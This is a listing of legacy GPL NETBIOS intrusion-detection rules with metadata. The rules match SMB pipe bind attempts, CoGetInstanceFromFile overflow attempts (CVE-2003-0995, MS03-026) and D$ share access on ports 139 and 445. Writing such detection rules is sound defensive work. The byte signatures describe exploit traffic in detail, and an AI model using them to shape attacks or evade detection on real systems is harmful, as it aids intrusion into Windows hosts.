alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103160; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103161

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103161; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102932

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102932; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103162

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103162; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103163

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103163; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102928

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|nddeapi|00|"; within:9; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102928; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102933

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102933; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102929

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102929; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB nddeapi unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103202

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103202; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102940

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102940; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102174

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|winreg|00|"; within:8; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102174; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103203

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103203; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103204

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103204; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102941

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102941; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102175

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|w|00|i|00|n|00|r|00|e|00|g|00 00 00|"; within:16; distance:78; nocase; flowbits:set,smb.tree.create.winreg; classtype:protocol-command-decode; sid:2102175; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103205

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103205; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103433

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103433; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103434

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103434; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103185

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103185; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103184

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103184; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103435

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103435; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103436

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103436; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103187

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103187; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103186

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103186; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102468

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS D$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"D|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102468; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS D$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102469

